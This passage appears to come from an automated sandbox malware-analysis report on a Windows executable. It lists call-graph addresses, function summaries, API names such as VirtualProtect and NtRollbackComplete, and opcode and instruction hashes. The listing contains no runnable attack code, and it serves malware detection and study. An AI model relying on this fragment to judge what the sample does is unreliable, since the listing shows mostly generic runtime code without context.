4214 7ff62d5f14c7 4213->4214 4215 7ff62d5f1394 2 API calls 4214->4215 4216 7ff62d5f14d6 4215->4216 4217 7ff62d5f1394 2 API calls 4216->4217 4218 7ff62d5f14e5 4217->4218 4219 7ff62d5f1394 2 API calls 4218->4219 4220 7ff62d5f14f4 4219->4220 4221 7ff62d5f1394 2 API calls 4220->4221 4222 7ff62d5f1503 4221->4222 4223 7ff62d5f1394 2 API calls 4222->4223 4224 7ff62d5f1512 4223->4224 4225 7ff62d5f1394 2 API calls 4224->4225 4226 7ff62d5f1521 4225->4226 4227 7ff62d5f1530 4226->4227 4228 7ff62d5f1394 2 API calls 4226->4228 4229 7ff62d5f1394 2 API calls 4227->4229 4228->4227 4230 7ff62d5f153a 4229->4230 4231 7ff62d5f153f 4230->4231 4232 7ff62d5f1394 2 API calls 4230->4232 4233 7ff62d5f1394 2 API calls 4231->4233 4232->4231 4234 7ff62d5f154e 4233->4234 4235 7ff62d5f1394 2 API calls 4234->4235 4236 7ff62d5f1558 4235->4236 4237 7ff62d5f155d 4236->4237 4238 7ff62d5f1394 2 API calls 4236->4238 4239 7ff62d5f1394 2 API calls 4237->4239 4238->4237 4240 7ff62d5f1567 4239->4240 4241 7ff62d5f156c 4240->4241 4242 7ff62d5f1394 2 API calls 4240->4242 4243 7ff62d5f1394 2 API calls 4241->4243 4242->4241 4244 7ff62d5f1576 4243->4244 4245 7ff62d5f157b 4244->4245 4246 7ff62d5f1394 2 API calls 4244->4246 4247 7ff62d5f1394 2 API calls 4245->4247 4246->4245 4248 7ff62d5f1585 4247->4248 4249 7ff62d5f158a 4248->4249 4250 7ff62d5f1394 2 API calls 4248->4250 4251 7ff62d5f1394 2 API calls 4249->4251 4250->4249 4252 7ff62d5f1599 4251->4252 4253 7ff62d5f1394 2 API calls 4252->4253 4254 7ff62d5f15a3 4253->4254 4255 7ff62d5f15a8 4254->4255 4256 7ff62d5f1394 2 API calls 4254->4256 4257 7ff62d5f1394 2 API calls 4255->4257 4256->4255 4258 7ff62d5f15b7 4257->4258 4259 7ff62d5f1394 2 API calls 4258->4259 4260 7ff62d5f15c1 4259->4260 4261 7ff62d5f1394 2 API calls 4260->4261 4262 7ff62d5f15c6 4261->4262 4263 7ff62d5f1394 2 API calls 4262->4263 4264 7ff62d5f15d5 4263->4264 4265 7ff62d5f1394 2 API calls 4264->4265 4266 7ff62d5f15e4 4265->4266 4267 7ff62d5f1394 2 API calls 4266->4267 4268 7ff62d5f15f3 4267->4268 4268->3720 4269 7ff62d5f149a 4268->4269 4270 7ff62d5f1394 2 API calls 4269->4270 4271 7ff62d5f14a4 4270->4271 4272 7ff62d5f14a9 4271->4272 4273 7ff62d5f1394 2 API calls 4271->4273 4274 7ff62d5f1394 2 API calls 4272->4274 4273->4272 4275 7ff62d5f14b3 4274->4275 4276 7ff62d5f1394 2 API calls 4275->4276 4277 7ff62d5f14b8 4276->4277 4278 7ff62d5f1394 2 API calls 4277->4278 4279 7ff62d5f14c7 4278->4279 4280 7ff62d5f1394 2 API calls 4279->4280 4281 7ff62d5f14d6 4280->4281 4282 7ff62d5f1394 2 API calls 4281->4282 4283 7ff62d5f14e5 4282->4283 4284 7ff62d5f1394 2 API calls 4283->4284 4285 7ff62d5f14f4 4284->4285 4286 7ff62d5f1394 2 API calls 4285->4286 4287 7ff62d5f1503 4286->4287 4288 7ff62d5f1394 2 API calls 4287->4288 4289 7ff62d5f1512 4288->4289 4290 7ff62d5f1394 2 API calls 4289->4290 4291 7ff62d5f1521 4290->4291 4292 7ff62d5f1530 4291->4292 4293 7ff62d5f1394 2 API calls 4291->4293 4294 7ff62d5f1394 2 API calls 4292->4294 4293->4292 4295 7ff62d5f153a 4294->4295 4296 7ff62d5f153f 4295->4296 4297 7ff62d5f1394 2 API calls 4295->4297 4298 7ff62d5f1394 2 API calls 4296->4298 4297->4296 4299 7ff62d5f154e 4298->4299 4300 7ff62d5f1394 2 API calls 4299->4300 4301 7ff62d5f1558 4300->4301 4302 7ff62d5f155d 4301->4302 4303 7ff62d5f1394 2 API calls 4301->4303 4304 7ff62d5f1394 2 API calls 4302->4304 4303->4302 4305 7ff62d5f1567 4304->4305 4306 7ff62d5f156c 4305->4306 4307 7ff62d5f1394 2 API calls 4305->4307 4308 7ff62d5f1394 2 API calls 4306->4308 4307->4306 4309 7ff62d5f1576 4308->4309 4310 7ff62d5f157b 4309->4310 4311 7ff62d5f1394 2 API calls 4309->4311 4312 7ff62d5f1394 2 API calls 4310->4312 4311->4310 4313 7ff62d5f1585 4312->4313 4314 7ff62d5f158a 4313->4314 4315 7ff62d5f1394 2 API calls 4313->4315 4316 7ff62d5f1394 2 API calls 4314->4316 4315->4314 4317 7ff62d5f1599 4316->4317 4318 7ff62d5f1394 2 API calls 4317->4318 4319 7ff62d5f15a3 4318->4319 4320 7ff62d5f15a8 4319->4320 4321 7ff62d5f1394 2 API calls 4319->4321 4322 7ff62d5f1394 2 API calls 4320->4322 4321->4320 4323 7ff62d5f15b7 4322->4323 4324 7ff62d5f1394 2 API calls 4323->4324 4325 7ff62d5f15c1 4324->4325 4326 7ff62d5f1394 2 API calls 4325->4326 4327 7ff62d5f15c6 4326->4327 4328 7ff62d5f1394 2 API calls 4327->4328 4329 7ff62d5f15d5 4328->4329 4330 7ff62d5f1394 2 API calls 4329->4330 4331 7ff62d5f15e4 4330->4331 4332 7ff62d5f1394 2 API calls 4331->4332 4333 7ff62d5f15f3 4332->4333 4333->3720 4333->3731 4335 7ff62d5f1394 2 API calls 4334->4335 4336 7ff62d5f1486 4335->4336 4337 7ff62d5f148b 4336->4337 4338 7ff62d5f1394 2 API calls 4336->4338 4339 7ff62d5f1394 2 API calls 4337->4339 4338->4337 4340 7ff62d5f1495 4339->4340 4341 7ff62d5f149a 4340->4341 4342 7ff62d5f1394 2 API calls 4340->4342 4343 7ff62d5f1394 2 API calls 4341->4343 4342->4341 4344 7ff62d5f14a4 4343->4344 4345 7ff62d5f14a9 4344->4345 4346 7ff62d5f1394 2 API calls 4344->4346 4347 7ff62d5f1394 2 API calls 4345->4347 4346->4345 4348 7ff62d5f14b3 4347->4348 4349 7ff62d5f1394 2 API calls 4348->4349 4350 7ff62d5f14b8 4349->4350 4351 7ff62d5f1394 2 API calls 4350->4351 4352 7ff62d5f14c7 4351->4352 4353 7ff62d5f1394 2 API calls 4352->4353 4354 7ff62d5f14d6 4353->4354 4355 7ff62d5f1394 2 API calls 4354->4355 4356 7ff62d5f14e5 4355->4356 4357 7ff62d5f1394 2 API calls 4356->4357 4358 7ff62d5f14f4 4357->4358 4359 7ff62d5f1394 2 API calls 4358->4359 4360 7ff62d5f1503 4359->4360 4361 7ff62d5f1394 2 API calls 4360->4361 4362 7ff62d5f1512 4361->4362 4363 7ff62d5f1394 2 API calls 4362->4363 4364 7ff62d5f1521 4363->4364 4365 7ff62d5f1530 4364->4365 4366 7ff62d5f1394 2 API calls 4364->4366 4367 7ff62d5f1394 2 API calls 4365->4367 4366->4365 4368 7ff62d5f153a 4367->4368 4369 7ff62d5f153f 4368->4369 4370 7ff62d5f1394 2 API calls 4368->4370 4371 7ff62d5f1394 2 API calls 4369->4371 4370->4369 4372 7ff62d5f154e 4371->4372 4373 7ff62d5f1394 2 API calls 4372->4373 4374 7ff62d5f1558 4373->4374 4375 7ff62d5f155d 4374->4375 4376 7ff62d5f1394 2 API calls 4374->4376 4377 7ff62d5f1394 2 API calls 4375->4377 4376->4375 4378 7ff62d5f1567 4377->4378 4379 7ff62d5f156c 4378->4379 4380 7ff62d5f1394 2 API calls 4378->4380 4381 7ff62d5f1394 2 API calls 4379->4381 4380->4379 4382 7ff62d5f1576 4381->4382 4383 7ff62d5f157b 4382->4383 4384 7ff62d5f1394 2 API calls 4382->4384 4385 7ff62d5f1394 2 API calls 4383->4385 4384->4383 4386 7ff62d5f1585 4385->4386 4387 7ff62d5f158a 4386->4387 4388 7ff62d5f1394 2 API calls 4386->4388 4389 7ff62d5f1394 2 API calls 4387->4389 4388->4387 4390 7ff62d5f1599 4389->4390 4391 7ff62d5f1394 2 API calls 4390->4391 4392 7ff62d5f15a3 4391->4392 4393 7ff62d5f15a8 4392->4393 4394 7ff62d5f1394 2 API calls 4392->4394 4395 7ff62d5f1394 2 API calls 4393->4395 4394->4393 4396 7ff62d5f15b7 4395->4396 4397 7ff62d5f1394 2 API calls 4396->4397 4398 7ff62d5f15c1 4397->4398 4399 7ff62d5f1394 2 API calls 4398->4399 4400 7ff62d5f15c6 4399->4400 4401 7ff62d5f1394 2 API calls 4400->4401 4402 7ff62d5f15d5 4401->4402 4403 7ff62d5f1394 2 API calls 4402->4403 4404 7ff62d5f15e4 4403->4404 4405 7ff62d5f1394 2 API calls 4404->4405 4406 7ff62d5f15f3 4405->4406 4406->3736 4408 7ff62d5f1394 2 API calls 4407->4408 4409 7ff62d5f15d5 4408->4409 4410 7ff62d5f1394 2 API calls 4409->4410 4411 7ff62d5f15e4 4410->4411 4412 7ff62d5f1394 2 API calls 4411->4412 4413 7ff62d5f15f3 4412->4413 4413->3716 4414 7ff62d5f2320 strlen 4415 7ff62d5f2337 4414->4415 4439 7ff62d5f1000 4440 7ff62d5f108b __set_app_type 4439->4440 4441 7ff62d5f1040 4439->4441 4443 7ff62d5f10b6 4440->4443 4441->4440 4442 7ff62d5f10e5 4443->4442 4445 7ff62d5f1e00 4443->4445 4446 7ff62d5f89a0 __setusermatherr 4445->4446 4447 7ff62d5f1800 4448 7ff62d5f1812 4447->4448 4449 7ff62d5f1835 fprintf 4448->4449 4416 7ff62d5f219e 4417 7ff62d5f2272 4416->4417 4418 7ff62d5f21ab EnterCriticalSection 4416->4418 4419 7ff62d5f2265 LeaveCriticalSection 4418->4419 4420 7ff62d5f21c8 4418->4420 4419->4417 4420->4419 4421 7ff62d5f21e9 TlsGetValue GetLastError 4420->4421 4421->4420 2776 7ff62d5f1394 2780 7ff62d5f8410 2776->2780 2778 7ff62d5f13b8 2779 7ff62d5f13c6 NtRollbackComplete 2778->2779 2781 7ff62d5f842e 2780->2781 2784 7ff62d5f845b 2780->2784 2781->2778 2782 7ff62d5f8503 2783 7ff62d5f851f malloc 2782->2783 2785 7ff62d5f8540 2783->2785 2784->2781 2784->2782 2785->2781 4422 7ff62d5f1ab3 4423 7ff62d5f1a70 4422->4423 4423->4422 4424 7ff62d5f199e 4423->4424 4425 7ff62d5f1b36 4423->4425 4429 7ff62d5f1b53 4423->4429 4426 7ff62d5f1a0f 4424->4426 4428 7ff62d5f19e9 VirtualProtect 4424->4428 4427 7ff62d5f1ba0 4 API calls 4425->4427 4427->4429 4428->4424 4450 7ff62d5f1e10 4451 7ff62d5f1e2f 4450->4451 4452 7ff62d5f1e55 4451->4452 4453 7ff62d5f1ecc 4451->4453 4455 7ff62d5f1eb5 4451->4455 4452->4455 4458 7ff62d5f1f12 signal 4452->4458 4454 7ff62d5f1ed3 signal 4453->4454 4453->4455 4454->4455 4456 7ff62d5f1ee4 4454->4456 4456->4455 4457 7ff62d5f1eea signal 4456->4457 4457->4455 4458->4455 4472 7ff62d5f1a70 4474 7ff62d5f199e 4472->4474 4477 7ff62d5f1a7d 4472->4477 4473 7ff62d5f1a0f 4474->4473 4475 7ff62d5f19e9 VirtualProtect 4474->4475 4475->4474 4476 7ff62d5f1b53 4477->4472 4477->4476 4478 7ff62d5f1b36 4477->4478 4479 7ff62d5f1ba0 4 API calls 4478->4479 4479->4476 4499 7ff62d5f2050 4500 7ff62d5f205e EnterCriticalSection 4499->4500 4501 7ff62d5f20cf 4499->4501 4502 7ff62d5f20c2 LeaveCriticalSection 4500->4502 4503 7ff62d5f2079 4500->4503 4502->4501 4503->4502 4504 7ff62d5f20bd free 4503->4504 4504->4502 4505 7ff62d5f1fd0 4506 7ff62d5f1fe4 4505->4506 4507 7ff62d5f2033 4505->4507 4506->4507 4508 7ff62d5f1ffd EnterCriticalSection LeaveCriticalSection 4506->4508 4508->4507 4480 7ff62d5f216f 4481 7ff62d5f2185 4480->4481 4482 7ff62d5f2178 InitializeCriticalSection 4480->4482 4482->4481 4509 7ff62d5f1f47 4510 7ff62d5f1e67 signal 4509->4510 4513 7ff62d5f1e99 4509->4513 4511 7ff62d5f1e7c 4510->4511 4510->4513 4512 7ff62d5f1e82 signal 4511->4512 4511->4513 4512->4513

                                                      Executed Functions

                                                      Function 00007FF62D5F1160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1491057517.00007FF62D5F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF62D5F0000, based on PE: true
                                                      • Associated: 00000018.00000002.1490955253.00007FF62D5F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491087337.00007FF62D5F9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491115659.00007FF62D5FB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491435684.00007FF62D874000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff62d5f0000_atpljrtdlbzl.jbxd
                                                      Similarity
                                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                      • String ID:
                                                      • API String ID: 2643109117-0
                                                      • Opcode ID: 6280596cb761b5b6b7eb17237f18733a4a3115df363d340f4ddf780b65251a53
                                                      • Instruction ID: 8c95d4949ca3767e0d4992e8003e3ce95dfb111b6b6208dd1674a93e87becdf9
                                                      • Opcode Fuzzy Hash: 6280596cb761b5b6b7eb17237f18733a4a3115df363d340f4ddf780b65251a53
                                                      • Instruction Fuzzy Hash: D3513975A09A4289FE109B16ED50B7927A4BF86780F049431CD4DEF3A6FEBCA441C723
                                                      Function 00007FF62D5F1394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • NtRollbackComplete.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62D5F1156), ref: 00007FF62D5F13F7
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1491057517.00007FF62D5F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF62D5F0000, based on PE: true
                                                      • Associated: 00000018.00000002.1490955253.00007FF62D5F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491087337.00007FF62D5F9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491115659.00007FF62D5FB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491435684.00007FF62D874000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff62d5f0000_atpljrtdlbzl.jbxd
                                                      Similarity
                                                      • API ID: CompleteRollback
                                                      • String ID:
                                                      • API String ID: 2623960542-0
                                                      • Opcode ID: 5448f1e04505633c8b83ac876f5ebd2ce998eb501d9696bc89039fdec386beb0
                                                      • Instruction ID: 764c643ff97642bab22362991b9c502825457b737d139103379e0d5991a2ea5b
                                                      • Opcode Fuzzy Hash: 5448f1e04505633c8b83ac876f5ebd2ce998eb501d9696bc89039fdec386beb0
                                                      • Instruction Fuzzy Hash: FDF0C971908F41CADB14DB51FC4002A7764FB4A381B004835ED9CAB725FF7CE0508B65

                                                      Non-executed Functions

                                                      Function 00007FF62D5F2690 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 322COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1491057517.00007FF62D5F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF62D5F0000, based on PE: true
                                                      • Associated: 00000018.00000002.1490955253.00007FF62D5F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491087337.00007FF62D5F9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491115659.00007FF62D5FB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491435684.00007FF62D874000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff62d5f0000_atpljrtdlbzl.jbxd
                                                      Similarity
                                                      • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                      • String ID: 0$7%2h$X$`
                                                      • API String ID: 329590056-1471948811
                                                      • Opcode ID: b95cf91eda7b68f57c5181f3b1c7e46db98f7d87f2357bb82c327b923f2a006a
                                                      • Instruction ID: f3bba8b52d9417ebc985a7fc0663b83d9a4926ad7a0cf5e496c41f3701f9af5f
                                                      • Opcode Fuzzy Hash: b95cf91eda7b68f57c5181f3b1c7e46db98f7d87f2357bb82c327b923f2a006a
                                                      • Instruction Fuzzy Hash: 00028E22A08B8189FB208F15EC443AA77A0FB857A4F008235DE9C9B7E5EF7CD145C752
                                                      Function 00007FF62D5F3350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1491057517.00007FF62D5F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF62D5F0000, based on PE: true
                                                      • Associated: 00000018.00000002.1490955253.00007FF62D5F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491087337.00007FF62D5F9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491115659.00007FF62D5FB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491435684.00007FF62D874000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff62d5f0000_atpljrtdlbzl.jbxd
                                                      Similarity
                                                      • API ID: memset$wcscatwcscpywcslen
                                                      • String ID: $0$0$@$@
                                                      • API String ID: 4263182637-1413854666
                                                      • Opcode ID: 1162d33619bbb34c0f2e9a143d3f60e9be2465dce8d2f97103770710023d22b8
                                                      • Instruction ID: d80e48b40a809958e2534c11ff561131a7e5198fe6554ddda8c12cad79a11696
                                                      • Opcode Fuzzy Hash: 1162d33619bbb34c0f2e9a143d3f60e9be2465dce8d2f97103770710023d22b8
                                                      • Instruction Fuzzy Hash: D3B1812191C6C199FB218B24EC453BAB7A0FF85344F404135EEC99ABA5EFBDE145CB12
                                                      Function 00007FF62D5F1BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • VirtualQuery.KERNEL32(?,?,?,?,00007FF62D5FA4A8,00007FF62D5FA4A8,?,?,00007FF62D5F0000,?,00007FF62D5F1991), ref: 00007FF62D5F1C63
                                                      • VirtualProtect.KERNEL32(?,?,?,?,00007FF62D5FA4A8,00007FF62D5FA4A8,?,?,00007FF62D5F0000,?,00007FF62D5F1991), ref: 00007FF62D5F1CC7
                                                      • memcpy.MSVCRT ref: 00007FF62D5F1CE0
                                                      • GetLastError.KERNEL32(?,?,?,?,00007FF62D5FA4A8,00007FF62D5FA4A8,?,?,00007FF62D5F0000,?,00007FF62D5F1991), ref: 00007FF62D5F1D23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1491057517.00007FF62D5F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF62D5F0000, based on PE: true
                                                      • Associated: 00000018.00000002.1490955253.00007FF62D5F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491087337.00007FF62D5F9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491115659.00007FF62D5FB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491435684.00007FF62D874000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff62d5f0000_atpljrtdlbzl.jbxd
                                                      Similarity
                                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                      • API String ID: 2595394609-2123141913
                                                      • Opcode ID: a73c2b82d557c5aae947ae703203d5278343e9bd1baf2771f34c60c14f44de3e
                                                      • Instruction ID: 84d75818e5cece5bff9c8d9062b2a79010c4d9d11c208fdfe0b60ac1ba94c6a3
                                                      • Opcode Fuzzy Hash: a73c2b82d557c5aae947ae703203d5278343e9bd1baf2771f34c60c14f44de3e
                                                      • Instruction Fuzzy Hash: E541AFA1A09A4399FE508B01DC44BB837A1EB86BC0F544132CE0DEB3A5FE7CE541C722
                                                      Function 00007FF62D5F2104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1491057517.00007FF62D5F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF62D5F0000, based on PE: true
                                                      • Associated: 00000018.00000002.1490955253.00007FF62D5F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491087337.00007FF62D5F9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491115659.00007FF62D5FB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491435684.00007FF62D874000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff62d5f0000_atpljrtdlbzl.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                      • String ID:
                                                      • API String ID: 3326252324-0
                                                      • Opcode ID: ebbd2e3b6cbfeac7cc2dca93027932662f1a6492cb86fc1cea6d36530fcbbc00
                                                      • Instruction ID: e79bfeca9544bfd144416b98e87f0cd3e0be6f4212940847fd67f162e24013e2
                                                      • Opcode Fuzzy Hash: ebbd2e3b6cbfeac7cc2dca93027932662f1a6492cb86fc1cea6d36530fcbbc00
                                                      • Instruction Fuzzy Hash: 0E21E965F09902A9FE659B019D407356260BF56B90F448030DD0EEFBA4FF7CA8828363
                                                      Function 00007FF62D5F1E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 640 7ff62d5f1e10-7ff62d5f1e2d 641 7ff62d5f1e3e-7ff62d5f1e48 640->641 642 7ff62d5f1e2f-7ff62d5f1e38 640->642 644 7ff62d5f1ea3-7ff62d5f1ea8 641->644 645 7ff62d5f1e4a-7ff62d5f1e53 641->645 642->641 643 7ff62d5f1f60-7ff62d5f1f69 642->643 644->643 648 7ff62d5f1eae-7ff62d5f1eb3 644->648 646 7ff62d5f1e55-7ff62d5f1e60 645->646 647 7ff62d5f1ecc-7ff62d5f1ed1 645->647 646->644 651 7ff62d5f1f23-7ff62d5f1f2d 647->651 652 7ff62d5f1ed3-7ff62d5f1ee2 signal 647->652 649 7ff62d5f1eb5-7ff62d5f1eba 648->649 650 7ff62d5f1efb-7ff62d5f1f0a call 7ff62d5f89b0 648->650 649->643 653 7ff62d5f1ec0 649->653 650->651 662 7ff62d5f1f0c-7ff62d5f1f10 650->662 654 7ff62d5f1f43-7ff62d5f1f45 651->654 655 7ff62d5f1f2f-7ff62d5f1f3f 651->655 652->651 656 7ff62d5f1ee4-7ff62d5f1ee8 652->656 653->651 654->643 661 7ff62d5f1f5a 655->661 658 7ff62d5f1f4e-7ff62d5f1f53 656->658 659 7ff62d5f1eea-7ff62d5f1ef9 signal 656->659 658->661 659->643 661->643 663 7ff62d5f1f55 662->663 664 7ff62d5f1f12-7ff62d5f1f21 signal 662->664 663->661 664->643 664->651
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1491057517.00007FF62D5F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF62D5F0000, based on PE: true
                                                      • Associated: 00000018.00000002.1490955253.00007FF62D5F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491087337.00007FF62D5F9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491115659.00007FF62D5FB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491435684.00007FF62D874000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff62d5f0000_atpljrtdlbzl.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CCG
                                                      • API String ID: 0-1584390748
                                                      • Opcode ID: 4a7ae61e09f356dcb3ca58e8778bf02f31e9e28ceccf92203711060f4d615a68
                                                      • Instruction ID: 56126f218b22b84bcaeb63db976f99a654f2be8aa9288a5504688bea868e8cae
                                                      • Opcode Fuzzy Hash: 4a7ae61e09f356dcb3ca58e8778bf02f31e9e28ceccf92203711060f4d615a68
                                                      • Instruction Fuzzy Hash: 9D21AF25F0C1064AFE7552149E80B7915819F8A7A4F298531DE1DEF3D8FFBDA8818273
                                                      Function 00007FF62D5F1880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 665 7ff62d5f1880-7ff62d5f189c 666 7ff62d5f18a2-7ff62d5f18f9 call 7ff62d5f2420 call 7ff62d5f2660 665->666 667 7ff62d5f1a0f-7ff62d5f1a1f 665->667 666->667 672 7ff62d5f18ff-7ff62d5f1910 666->672 673 7ff62d5f1912-7ff62d5f191c 672->673 674 7ff62d5f193e-7ff62d5f1941 672->674 675 7ff62d5f191e-7ff62d5f1929 673->675 676 7ff62d5f194d-7ff62d5f1954 673->676 674->676 677 7ff62d5f1943-7ff62d5f1947 674->677 675->676 680 7ff62d5f192b-7ff62d5f193a 675->680 678 7ff62d5f199e-7ff62d5f19a6 676->678 679 7ff62d5f1956-7ff62d5f1961 676->679 677->676 681 7ff62d5f1a20-7ff62d5f1a26 677->681 678->667 683 7ff62d5f19a8-7ff62d5f19c1 678->683 682 7ff62d5f1970-7ff62d5f199c call 7ff62d5f1ba0 679->682 680->674 684 7ff62d5f1a2c-7ff62d5f1a37 681->684 685 7ff62d5f1b87-7ff62d5f1b98 call 7ff62d5f1d40 681->685 682->678 687 7ff62d5f19df-7ff62d5f19e7 683->687 684->678 689 7ff62d5f1a3d-7ff62d5f1a5f 684->689 691 7ff62d5f19d0-7ff62d5f19dd 687->691 692 7ff62d5f19e9-7ff62d5f1a0d VirtualProtect 687->692 694 7ff62d5f1a7d-7ff62d5f1a97 689->694 691->667 691->687 692->691 695 7ff62d5f1b74-7ff62d5f1b82 call 7ff62d5f1d40 694->695 696 7ff62d5f1a9d-7ff62d5f1afa 694->696 695->685 701 7ff62d5f1b22-7ff62d5f1b26 696->701 702 7ff62d5f1afc-7ff62d5f1b0e 696->702 705 7ff62d5f1a70-7ff62d5f1a77 701->705 706 7ff62d5f1b2c-7ff62d5f1b30 701->706 703 7ff62d5f1b10-7ff62d5f1b20 702->703 704 7ff62d5f1b5c-7ff62d5f1b6f call 7ff62d5f1d40 702->704 703->701 703->704 704->695 705->678 705->694 706->705 708 7ff62d5f1b36-7ff62d5f1b53 call 7ff62d5f1ba0 706->708 708->704
                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62D5F1247), ref: 00007FF62D5F19F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1491057517.00007FF62D5F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF62D5F0000, based on PE: true
                                                      • Associated: 00000018.00000002.1490955253.00007FF62D5F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491087337.00007FF62D5F9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491115659.00007FF62D5FB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000018.00000002.1491435684.00007FF62D874000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff62d5f0000_atpljrtdlbzl.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                      • API String ID: 544645111-395989641
                                                      • Opcode ID: 2650d536b62deb3d9d47a44c5ad09f6013c99e194f6b6cbe57e8081442e2c579
                                                      • Instruction ID: 57029d4aa71c3b2a3076bdfac20101a8a7c31f9d9ce3a4c75ab1e07156f053e4
                                                      • Opcode Fuzzy Hash: 2650d536b62deb3d9d47a44c5ad09f6013c99e194f6b6cbe57e8081442e2c579
                                                      • Instruction Fuzzy Hash: 83516F36F08546DAEF148F21DD40BB83761AB16B94F448131DD1C9B7A4EEBCE481CB62
